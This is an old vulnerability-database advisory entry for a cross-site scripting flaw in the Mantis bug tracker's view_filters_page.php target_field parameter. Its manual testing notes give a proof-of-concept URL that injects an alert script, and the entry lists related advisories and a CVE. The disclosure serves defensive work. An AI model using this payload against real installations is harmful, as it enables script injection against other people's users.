Mantis view_filters_page.php target_field Variable XSS

2005-12-13T07:03:04
ID OSVDB:21686
Type osvdb
Reporter OSVDB
Modified 2005-12-13T07:03:04

Description

Manual Testing Notes

/view_filters_page.php?for_screen=1&target_field=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

References:

Vendor URL: http://www.mantisbt.org/ Vendor Specific Advisory URL Secunia Advisory ID:18018 Secunia Advisory ID:18481 Other Advisory URL: http://pridels.blogspot.com/2005/12/mantis-bugtracking-system-xss-vuln.html FrSIRT Advisory: ADV-2005-2874 CVE-2005-4238 Bugtraq ID: 15842